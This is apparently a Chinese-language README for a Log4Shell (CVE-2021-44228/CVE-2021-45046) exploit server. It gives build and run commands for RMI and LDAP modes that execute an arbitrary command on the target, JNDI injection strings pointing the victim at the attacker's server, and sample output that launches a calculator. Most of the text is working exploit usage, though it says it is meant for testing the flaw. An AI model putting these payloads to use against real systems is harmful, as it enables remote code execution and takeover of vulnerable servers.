该项目将帮助测试 Log4j CVE-2021-44228/CVE-2021-45046 漏洞。
需要 Java 1.8+ 和 Maven 3.x+
mvn clean package -DskipTestsjava -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 1 <RMI_IP> <RMI_PORT> <HTTP_PORT> <COMMAND>
你不再需要托管 Exploit.class。该应用程序将在指定端口上启动一个 HTTP 服务器。
你必须指明要在目标上运行的命令。
注入:{jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}
java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 2 <LDAP_IP> <LDAP_PORT> <HTTP_PORT> <COMMAND>
你不再需要托管 Exploit.class。该应用程序将在指定端口上启动一个 HTTP 服务器。
你必须指明要在目标上运行的命令。
注入:{jndi:ldap://<LDAP_IP>:<LDAP_PORT>/Exploit}
java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 <RMI_IP> <RMI_PORT> <COMMAND>
注入:{jndi:rmi://<RMI_IP>:<RMI_PORT>/Foo}
$ java -jar Log4j-JNDIServer-1.0-SNAPSHOT-all.jar 3 127.0.0.1 1389 /usr/bin/gnome-calculator
- 为 Tomcat 启动 RMI 服务器 -
- 在端口 1389 上创建 RMI 服务器 -
- 引用已绑定! -
- RMI 服务器已在 127.0.0.1:1389 启动 -
- Log4J 注入路径:${jndi:rmi://127.0.0.1:1389/Foo} -